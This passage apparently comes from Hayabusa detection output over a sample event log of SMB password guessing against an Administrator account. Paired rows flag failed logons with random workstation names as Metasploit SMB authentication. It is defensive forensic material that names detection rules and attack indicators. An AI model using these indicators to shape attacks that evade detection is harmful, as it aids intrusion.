Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 